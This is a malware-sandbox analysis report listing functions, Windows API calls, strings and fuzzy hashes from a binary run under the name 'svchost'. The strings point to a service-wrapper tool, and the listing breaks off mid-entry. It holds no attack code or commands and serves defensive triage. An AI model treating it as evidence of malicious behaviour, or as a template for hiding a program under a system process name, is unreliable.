Source File: 00000005.00000002.1347748964.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.1347735341.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1347768887.000000000041D000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1347786260.0000000000422000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1347801041.0000000000426000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_svchost.jbxd

Similarity

API ID: Heap$ConfigErrorLastProcessQueryService$AllocFree
String ID: QUERY_SERVICE_CONFIG$query_service_config()
API String ID: 2921672788-976127789
Opcode ID: f0828055e39d8f9797993dd67b379e2a0b7a4cee187890433159a102a33d25e2
Instruction ID: ec6184287c6e1aa3659987899a8ea3cdc59ea47e861b503f6ba41a7943c46725
Opcode Fuzzy Hash: f0828055e39d8f9797993dd67b379e2a0b7a4cee187890433159a102a33d25e2
Instruction Fuzzy Hash: 3F21D5F2A452017BE600A7A5EC8AFBF775CEFC5329F10893AF605D3181DA78D8049679

Function 00404FB0 Relevance: 17.6, APIs: 8, Strings: 2, Instructions: 84memoryCOMMON

Download Yara Rule

APIs

ExpandEnvironmentStringsW.KERNEL32(?,00000000,00000000), ref: 00404FBB
GetLastError.KERNEL32(00000000), ref: 00404FC8

Part of subcall function 004052C0: TlsGetValue.KERNEL32(00000000,?,00401042,00000000,00000000), ref: 004052C7
Part of subcall function 004052C0: LocalAlloc.KERNEL32(00000040,0000FFFF,?,00401042,00000000,00000000), ref: 004052DA

Part of subcall function 00405400: RegisterEventSourceW.ADVAPI32(00000000,nssm), ref: 0040540B
Part of subcall function 00405400: ReportEventW.ADVAPI32(00000000,?,00000000), ref: 00405459
Part of subcall function 00405400: DeregisterEventSource.ADVAPI32(00000000), ref: 00405460

GetProcessHeap.KERNEL32(00000000,00000000), ref: 00404FFB
HeapAlloc.KERNEL32(00000000), ref: 00404FFE

Strings

ExpandEnvironmentStrings(), xrefs: 00405010
expand_environment_string, xrefs: 0040500B

Memory Dump Source

Source File: 00000005.00000002.1347748964.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.1347735341.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1347768887.000000000041D000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1347786260.0000000000422000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1347801041.0000000000426000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_svchost.jbxd

Similarity

API ID: Event$AllocHeapSource$DeregisterEnvironmentErrorExpandLastLocalProcessRegisterReportStringsValue
String ID: ExpandEnvironmentStrings()$expand_environment_string
API String ID: 834161584-2090451141
Opcode ID: f59b1bc273204f5623afe584567ecfba35516a339bb065064b188413960d3f6b
Instruction ID: 1c240b0065301ebdc15cfa0ece81b4dfea20bbf87cc1a9778ddf823e08b6aba0
Opcode Fuzzy Hash: f59b1bc273204f5623afe584567ecfba35516a339bb065064b188413960d3f6b
Instruction Fuzzy Hash: AF11B2F2A416017BE21026B5BC4AFEB771CDB8076AF114472FA05E2182EA79C54045B9

Function 0040E600 Relevance: 17.6, APIs: 7, Strings: 3, Instructions: 81memoryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32(00000000,00000016), ref: 0040E620
HeapAlloc.KERNEL32(00000000), ref: 0040E623
__snwprintf_s.LIBCMT ref: 0040E658
GetProcessHeap.KERNEL32(00000000,00000000), ref: 0040E682
HeapFree.KERNEL32(00000000), ref: 0040E685

Part of subcall function 00405400: RegisterEventSourceW.ADVAPI32(00000000,nssm), ref: 0040540B
Part of subcall function 00405400: ReportEventW.ADVAPI32(00000000,?,00000000), ref: 00405459
Part of subcall function 00405400: DeregisterEventSource.ADVAPI32(00000000), ref: 00405460

GetProcessHeap.KERNEL32(00000000,00000000), ref: 0040E6C4
HeapFree.KERNEL32(00000000), ref: 0040E6C7

Strings

log_service_control(), xrefs: 0040E630, 0040E666
control code, xrefs: 0040E635, 0040E66B
0x%08x, xrefs: 0040E64E

Memory Dump Source

Source File: 00000005.00000002.1347748964.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.1347735341.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1347768887.000000000041D000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1347786260.0000000000422000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1347801041.0000000000426000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_svchost.jbxd

Similarity

API ID: Heap$EventProcess$FreeSource$AllocDeregisterRegisterReport__snwprintf_s
String ID: 0x%08x$control code$log_service_control()
API String ID: 844069407-2089045330
Opcode ID: 9ef0c78e7c00f931eee4f5ffaa9126fd3d2030249d315e71256b6d1e8744bc2b
Instruction ID: 612ea0ede9ba1e7cb3a868644965a314014b177a7dd95aa26f1d9d3cb81d428a
Opcode Fuzzy Hash: 9ef0c78e7c00f931eee4f5ffaa9126fd3d2030249d315e71256b6d1e8744bc2b
Instruction Fuzzy Hash: 6211CBF2B4031037E62062676C46FDF2648CB90BAAF550976FA09B61C2D5BD8C5141BD

Function 004084D0 Relevance: 16.0, APIs: 4, Strings: 5, Instructions: 227COMMON

Download Yara Rule

APIs

__snwprintf_s.LIBCMT ref: 00408511

Part of subcall function 00412731: __vsnwprintf_s_l.LIBCMT ref: 00412748

Part of subcall function 00405400: RegisterEventSourceW.ADVAPI32(00000000,nssm), ref: 0040540B
Part of subcall function 00405400: ReportEventW.ADVAPI32(00000000,?,00000000), ref: 00405459
Part of subcall function 00405400: DeregisterEventSource.ADVAPI32(00000000), ref: 00405460

Strings

get_createfile_parameters(), xrefs: 0040851F, 004085AA, 00408620, 00408699
ShareMode, xrefs: 00408588, 004085AF
CreationDisposition, xrefs: 004085FE, 00408625
%s%s, xrefs: 0040858E, 00408604, 0040867D
FlagsAndAttributes, xrefs: 00408677, 0040869E

Memory Dump Source

Source File: 00000005.00000002.1347748964.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.1347735341.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1347768887.000000000041D000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1347786260.0000000000422000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1347801041.0000000000426000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_svchost.jbxd

Similarity

API ID: Event$Source$DeregisterRegisterReport__snwprintf_s__vsnwprintf_s_l
String ID: %s%s$CreationDisposition$FlagsAndAttributes$ShareMode$get_createfile_parameters()
API String ID: 2445375048-825329064
Opcode ID: b56b3a038a3fb234e7910174b92c3cda99c27529ad80f9ad3da27b13678a7099
Instruction ID: d5bcaed63e337bfabc806c2c34b187c565ea729d6d27f924a01f1bb630a1831b
Opcode Fuzzy Hash: b56b3a038a3fb234e7910174b92c3cda99c27529ad80f9ad3da27b13678a7099
Instruction Fuzzy Hash: D0511AB27443001BD200A61A9D43FEFB3D4AB98779FD4052FF649E62C1FA7DD580869A

Function 0040C610 Relevance: 15.9, APIs: 8, Strings: 1, Instructions: 169COMMON

Download Yara Rule

Strings

%c%u, xrefs: 0040C779

Memory Dump Source

Source File: 00000005.00000002.1347748964.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.1347735341.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1347768887.000000000041D000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1347786260.0000000000422000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1347801041.0000000000426000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_svchost.jbxd

Similarity

API ID:
String ID: %c%u
API String ID: 0-883269693
Opcode ID: a6a9a78c627fcc7f84f026c182eb2424cb4b7fe8dcf98c1fa97da1e8e50362f1
Instruction ID: fcb05bf5aa25034c6b283f3d3c8d8d5dbfc9814c65828dd12b5a4fa76bd1d4d2
Opcode Fuzzy Hash: a6a9a78c627fcc7f84f026c182eb2424cb4b7fe8dcf98c1fa97da1e8e50362f1
Instruction Fuzzy Hash: 5A51BE729443058BD324DF68E8C57ABB3E5FB84310F544A3EE854D33A0E77A98458A9A

Function 004052C0 Relevance: 15.8, APIs: 7, Strings: 2, Instructions: 65windowmemoryCOMMON

Download Yara Rule

APIs

TlsGetValue.KERNEL32(00000000,?,00401042,00000000,00000000), ref: 004052C7
LocalAlloc.KERNEL32(00000040,0000FFFF,?,00401042,00000000,00000000), ref: 004052DA
TlsSetValue.KERNEL32(00000000,00000000,?,00401042,00000000,00000000), ref: 004052F5
GetUserDefaultLangID.KERNEL32(00000000,0000FFFF,00000000,?,?,?,00401042,00000000,00000000), ref: 00405305
FormatMessageW.KERNEL32(00001200,00000000,?,?,?,?,?,00401042,00000000,00000000), ref: 00405321
FormatMessageW.KERNEL32(00001200,00000000,?,00000000,00000000,0000FFFF,00000000,?,?,?,?,00401042,00000000,00000000), ref: 00405336
__snwprintf_s.LIBCMT ref: 0040534A

Strings

system error %lu, xrefs: 0040533D
<out of memory for error message>, xrefs: 004052E6

Memory Dump Source

Source File: 00000005.00000002.1347748964.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.1347735341.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1347768887.000000000041D000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1347786260.0000000000422000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1347801041.0000000000426000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_svchost.jbxd

Similarity

API ID: FormatMessageValue$AllocDefaultLangLocalUser__snwprintf_s
String ID: <out of memory for error message>$system error %lu
API String ID: 1317610408-3923297632
Opcode ID: b5758bec216b926b4d62f608ffe3328bbd5e3024216705962de944ccca3494a7
Instruction ID: f23edb150031ebe2e0488c34495c660aa377f69acf961f8f06e15d9152bb88fb
Opcode Fuzzy Hash: b5758bec216b926b4d62f608ffe3328bbd5e3024216705962de944ccca3494a7
Instruction Fuzzy Hash: 630180B2B4472377E23066657C05EBB2B58DF86BA5F144276FE20E62D0D978CC0195AC

Function 0040A040 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 115COMMON

Download Yara Rule

APIs

OpenProcess.KERNEL32(00000400,00000000,?), ref: 0040A083
__snwprintf_s.LIBCMT ref: 0040A0A1
GetLastError.KERNEL32(00000000), ref: 0040A0AA

Strings

%lu, xrefs: 0040A093

Memory Dump Source

Source File: 00000005.00000002.1347748964.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.1347735341.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1347768887.000000000041D000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1347786260.0000000000422000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1347801041.0000000000426000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_svchost.jbxd

Similarity

API ID: ErrorLastOpenProcess__snwprintf_s
String ID: %lu
API String ID: 1619034979-685833217
Opcode ID: fd9c7b49e71a33996ba9c2a805d512b294e08a555ec79916aaafb0d51c83362a
Instruction ID: 8f5ceacfd598cb2394abf54756f4a9d9aecdfdb9d28b481e073514ca66ad884b
Opcode Fuzzy Hash: fd9c7b49e71a33996ba9c2a805d512b294e08a555ec79916aaafb0d51c83362a
Instruction Fuzzy Hash: 6C31ADB66002006BD2049765DC82EEFB3A4EF8C324F84452FF509D7291F678E69587DA

Function 0040A330 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 109COMMON

Download Yara Rule

Strings

kill_console, xrefs: 0040A437

Memory Dump Source

Source File: 00000005.00000002.1347748964.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.1347735341.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1347768887.000000000041D000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1347786260.0000000000422000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1347801041.0000000000426000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_svchost.jbxd

Similarity

API ID:
String ID: kill_console
API String ID: 0-1600766264
Opcode ID: b512eac6a5c75acfedc64106a28a87c7925d39300a97012badd4a903b776b279
Instruction ID: 6b8feeb58a831c22132309c7bed50a8a77aa2e1ca0f50238c9c6c98eb8e5a449
Opcode Fuzzy Hash: b512eac6a5c75acfedc64106a28a87c7925d39300a97012badd4a903b776b279
Instruction Fuzzy Hash: 202106F6A0030067F6206665BC4AFEB325CCB8035CF45843AFA09E72C2F97DDC9145AA

Function 00410F20 Relevance: 13.6, APIs: 9, Instructions: 143COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.1347748964.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.1347735341.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1347768887.000000000041D000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1347786260.0000000000422000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1347801041.0000000000426000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_svchost.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6f38156d83b47b1d3b9d2af6ee629cc77d86bd27f8c3302232bc967707eea2e8
Instruction ID: 426f323d08f1782c1e6f60194951a9d10300faf2c5e3bd40731d4607ec8a1430
Opcode Fuzzy Hash: 6f38156d83b47b1d3b9d2af6ee629cc77d86bd27f8c3302232bc967707eea2e8
Instruction Fuzzy Hash: 0041B772A042015FC720DB55DC45BEBB3E8EBC8754F04492AF95483240E7B8E9C5C7A6

Function 0040B5D0 Relevance: 12.4, APIs: 5, Strings: 2, Instructions: 113registryCOMMON

Download Yara Rule

APIs

Part of subcall function 0040B310: __snwprintf_s.LIBCMT ref: 0040B349

RegQueryValueExW.ADVAPI32(00000000,?,00000000,?,?,?), ref: 0040B65F
RegCloseKey.ADVAPI32(00000000), ref: 0040B66A

Strings

AppExit, xrefs: 0040B5FC
%lu, xrefs: 0040B69B

Memory Dump Source

Source File: 00000005.00000002.1347748964.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.1347735341.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1347768887.000000000041D000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1347786260.0000000000422000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1347801041.0000000000426000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_svchost.jbxd

Similarity

API ID: CloseQueryValue__snwprintf_s
String ID: %lu$AppExit
API String ID: 2736435911-2506947422
Opcode ID: 360aecef11bcee73e09b5d0cd0e78933fc472dd2aa08b67d38fa45625f26d4c0
Instruction ID: c411b45a6930565bb1268b54e23c5314efaf1e743d4ddd058092e23d946cddcd
Opcode Fuzzy Hash: 360aecef11bcee73e09b5d0cd0e78933fc472dd2aa08b67d38fa45625f26d4c0
Instruction Fuzzy Hash: 4E31B2726043046BD300DB25DC41AAFB7E8EFC8314F84492EFA5992281FB7AD5458BDA

Function 004122D0 Relevance: 12.1, APIs: 2, Strings: 6, Instructions: 91memoryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32(00000000,00000000), ref: 004122FA
HeapFree.KERNEL32(00000000), ref: 00412301

Strings

SERVICE_WIN32_SHARE_PROCESS|SERVICE_INTERACTIVE_PROCESS, xrefs: 00412398, 0041239D
SERVICE_INTERACTIVE_PROCESS, xrefs: 004123AD, 004123B2
SERVICE_FILE_SYSTEM_DRIVER, xrefs: 00412338, 0041233D
SERVICE_WIN32_SHARE_PROCESS, xrefs: 00412362, 00412367
SERVICE_KERNEL_DRIVER, xrefs: 0041234D, 00412352
SERVICE_WIN32_OWN_PROCESS, xrefs: 00412323, 00412328

Memory Dump Source

Source File: 00000005.00000002.1347748964.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.1347735341.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1347768887.000000000041D000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1347786260.0000000000422000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1347801041.0000000000426000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_svchost.jbxd

Similarity

API ID: Heap$FreeProcess
String ID: SERVICE_FILE_SYSTEM_DRIVER$SERVICE_INTERACTIVE_PROCESS$SERVICE_KERNEL_DRIVER$SERVICE_WIN32_OWN_PROCESS$SERVICE_WIN32_SHARE_PROCESS$SERVICE_WIN32_SHARE_PROCESS|SERVICE_INTERACTIVE_PROCESS
API String ID: 3859560861-2402770260
Opcode ID: c4bcd49acf320aad884df7014bda7e7aedb362f20f7b40cc470d6da00f593dac
Instruction ID: 3fa550764ded5b60e080b7974a66712a4ad7996e9d168e8143a02efed0acfda5
Opcode Fuzzy Hash: c4bcd49acf320aad884df7014bda7e7aedb362f20f7b40cc470d6da00f593dac
Instruction Fuzzy Hash: BC21AFFE6003051BD600DB79AEC99AB335CEB85309F18896AFC14C2341E37DECD49269

Function 00408250 Relevance: 12.1, APIs: 8, Instructions: 73memorylibraryloaderCOMMON

Download Yara Rule

APIs

GetProcAddress.KERNEL32(?,?), ref: 00408267
GetLastError.KERNEL32 ref: 0040827B
__cftoe.LIBCMT ref: 0040828F

Part of subcall function 00413380: __mbstowcs_s_l.LIBCMT ref: 00413396

GetProcessHeap.KERNEL32(00000000,00000000), ref: 004082A7
HeapAlloc.KERNEL32(00000000), ref: 004082AA
__cftoe.LIBCMT ref: 004082C7
GetProcessHeap.KERNEL32(00000000,00000000), ref: 004082F9
HeapFree.KERNEL32(00000000), ref: 004082FC

Memory Dump Source

Source File: 00000005.00000002.1347748964.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.1347735341.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1347768887.000000000041D000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1347786260.0000000000422000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1347801041.0000000000426000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_svchost.jbxd

Similarity

API ID: Heap$Process__cftoe$AddressAllocErrorFreeLastProc__mbstowcs_s_l
String ID:
API String ID: 323180873-0
Opcode ID: b05e2564cea1b0aa3f2908587e94aa4160ead8b2f5666b2d7813d052930b67d1
Instruction ID: 2e5e402e2c2626b49358907e613a0df75488633df38e2a23a78af6a6010d2103
Opcode Fuzzy Hash: b05e2564cea1b0aa3f2908587e94aa4160ead8b2f5666b2d7813d052930b67d1
Instruction Fuzzy Hash: C911D2B1505310BBC3109B55DC49F9BB7ACEF89718F10466DF915A7282DA34D800CB7A

Function 00405790 Relevance: 12.0, APIs: 8, Instructions: 42COMMON

Download Yara Rule

APIs

GetDlgItem.USER32(00000000,0000040D), ref: 004057AF
EnableWindow.USER32(00000000), ref: 004057B8
GetDlgItem.USER32(00000000,0000040F), ref: 004057CA
EnableWindow.USER32(00000000), ref: 004057CD
GetDlgItem.USER32(00000000,00000410), ref: 004057DB
EnableWindow.USER32(00000000), ref: 004057DE
GetDlgItem.USER32(00000000,00000411), ref: 004057ED
EnableWindow.USER32(00000000), ref: 004057F0

Memory Dump Source

Source File: 00000005.00000002.1347748964.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.1347735341.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1347768887.000000000041D000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1347786260.0000000000422000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1347801041.0000000000426000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_svchost.jbxd

Similarity

API ID: EnableItemWindow
String ID:
API String ID: 3833022359-0
Opcode ID: 31b3fd158049fa77296440bbcea545347585c868fa80e3e4f9f83df952b283d7
Instruction ID: e2f7c1c09c8d93b2009dc5b4c4f002420ea12ae4a46ab4e20d95bb4881afef45
Opcode Fuzzy Hash: 31b3fd158049fa77296440bbcea545347585c868fa80e3e4f9f83df952b283d7
Instruction Fuzzy Hash: 37F0AEF1F4031C36D610E7B57C84D676B6CEBC4591B058436B700D3190CDF8EA058A74

Function 00411F00 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 143COMMON

Download Yara Rule

APIs

_fwprintf.LIBCMT ref: 00411F91

Strings

%s, xrefs: 00411F83

Memory Dump Source

Source File: 00000005.00000002.1347748964.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.1347735341.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1347768887.000000000041D000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1347786260.0000000000422000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1347801041.0000000000426000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_svchost.jbxd

Similarity

API ID: _fwprintf
String ID: %s
API String ID: 394020290-620797490
Opcode ID: 2c1e00e8f750eab5735f62461effd94720a9cb9abffd7c14ceba235e15ae4272
Instruction ID: 75f6ff0ad44b13ca8f97eaa8f5d04c03990c627219346353a10bb8e85013ff75
Opcode Fuzzy Hash: 2c1e00e8f750eab5735f62461effd94720a9cb9abffd7c14ceba235e15ae4272
Instruction Fuzzy Hash: EC4135B1A0020067E6105B79AD49BAB73489B44329F14023AF715E72E2E778CC92D6AD

Function 0040B460 Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 120COMMON

Download Yara Rule

APIs

Part of subcall function 004084D0: __snwprintf_s.LIBCMT ref: 00408511

_memset.LIBCMT ref: 0040B4CF
_memset.LIBCMT ref: 0040B544

Strings

AppStdin, xrefs: 0040B492
AppStderr, xrefs: 0040B57C
AppStdout, xrefs: 0040B507

Memory Dump Source

Source File: 00000005.00000002.1347748964.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.1347735341.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1347768887.000000000041D000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1347786260.0000000000422000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1347801041.0000000000426000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_svchost.jbxd

Similarity

API ID: _memset$__snwprintf_s
String ID: AppStderr$AppStdin$AppStdout
API String ID: 2562117923-491939989
Opcode ID: 4e0be652339b1084abb8e3e740910de37694cbfcd9fe9fd7c93284c9240b7e06
Instruction ID: 1b06f4d84a2b42bb779b35d5d98be90b00d199c4a4a766b1a98f55c8d30fc170
Opcode Fuzzy Hash: 4e0be652339b1084abb8e3e740910de37694cbfcd9fe9fd7c93284c9240b7e06
Instruction Fuzzy Hash: B24180F2644305BBE320DE55EC42F97B3ECEF84755F10042EF2598A2C1EBB5A5488BA5

Function 004102C0 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 69memoryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32(00000000), ref: 004102F8
HeapAlloc.KERNEL32(00000000), ref: 004102FB
__snwprintf_s.LIBCMT ref: 0041031D
GetProcessHeap.KERNEL32(00000000,00000000), ref: 0041032E
HeapFree.KERNEL32(00000000), ref: 00410331

Strings

value_from_string(), xrefs: 0041030B, 0041033B

Memory Dump Source

Source File: 00000005.00000002.1347748964.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.1347735341.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1347768887.000000000041D000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1347786260.0000000000422000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1347801041.0000000000426000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_svchost.jbxd

Similarity

API ID: Heap$Process$AllocFree__snwprintf_s
String ID: value_from_string()
API String ID: 2465375985-962593079
Opcode ID: 32f829b42f32a28a4e5a4ac7d68f27ece40f46b8ce26e11d520957f2533d3fbb
Instruction ID: bb1032cf64baaab7dc3efed814e35f34ffcfd1963eead0c03da6be78f6f1ad05
Opcode Fuzzy Hash: 32f829b42f32a28a4e5a4ac7d68f27ece40f46b8ce26e11d520957f2533d3fbb
Instruction Fuzzy Hash: 271129B26042156BD71067AADC45FE7339CDF91369F004666FC29C72C0E6F8E8C08669

Function 004088E0 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 66timeCOMMON

Download Yara Rule

APIs

GetSystemTime.KERNEL32(?), ref: 00408909
PathFindExtensionW.SHLWAPI(?), ref: 00408927
__snwprintf_s.LIBCMT ref: 00408966
__snwprintf_s.LIBCMT ref: 0040898D

Strings

-%04u%02u%02uT%02u%02u%02u.%03u%s, xrefs: 00408952
%s%s, xrefs: 0040897A

Memory Dump Source

Source File: 00000005.00000002.1347748964.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.1347735341.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1347768887.000000000041D000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1347786260.0000000000422000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1347801041.0000000000426000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_svchost.jbxd

Similarity

API ID: __snwprintf_s$ExtensionFindPathSystemTime
String ID: %s%s$-%04u%02u%02uT%02u%02u%02u.%03u%s
API String ID: 104670371-3937541175
Opcode ID: b111bf3271d38600ad9c55f70640b5fcacb5e3e09fac70907e172ba85b97e1c1
Instruction ID: b79bb978c2d6968e54da41b461fb302b9f59bf9436526885e0c642140c4c9fbb
Opcode Fuzzy Hash: b111bf3271d38600ad9c55f70640b5fcacb5e3e09fac70907e172ba85b97e1c1
Instruction Fuzzy Hash: 6111B4B15143116ED334DB55DC41DBBB3E8EFC8B10F40892EB9A9C22D1EABC9580D7A5

Function 004051B0 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 62processCOMMON

Download Yara Rule

APIs

GetModuleFileNameW.KERNEL32(00000000,?,00007FFF), ref: 004051DC
_memset.LIBCMT ref: 004051EB
CreateProcessW.KERNEL32 ref: 0040522C
TerminateProcess.KERNEL32(?,00000000), ref: 0040523D
GetLastError.KERNEL32 ref: 0040525A

Strings

D, xrefs: 00405224

Memory Dump Source

Source File: 00000005.00000002.1347748964.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.1347735341.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1347768887.000000000041D000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1347786260.0000000000422000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1347801041.0000000000426000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_svchost.jbxd

Similarity

API ID: Process$CreateErrorFileLastModuleNameTerminate_memset
String ID: D
API String ID: 3492820992-2746444292
Opcode ID: 9dd1c94f525b39c6e15edc8379d8a417f697b7542ed4c4ee5f829fe84b09a39f
